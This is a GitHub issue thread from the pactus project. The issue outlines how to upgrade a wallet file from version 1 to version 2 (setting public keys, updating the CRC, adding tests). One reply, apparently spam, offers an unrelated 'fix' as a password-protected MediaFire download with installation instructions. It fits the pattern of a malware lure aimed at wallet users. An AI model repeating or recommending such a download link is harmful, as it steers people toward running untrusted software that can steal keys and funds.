### ISSUE TITLE
Upgrading wallet

### ISSUE THREAD

**Issue by b00f** [pactus-project/pactus#1487]
**Wallet Upgrade from Version 1 to Version 2:**

1. **Check for Public Key:** If an address has no public key, set it.
2. **AddressInfo Function:** Simply return the address info, as all addresses should now have a public key.
3. **Update CRC:** Update the CRC to prevent CRC mismatch error.
4. **Unit Testing:** Write a unit test to cover this change.

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
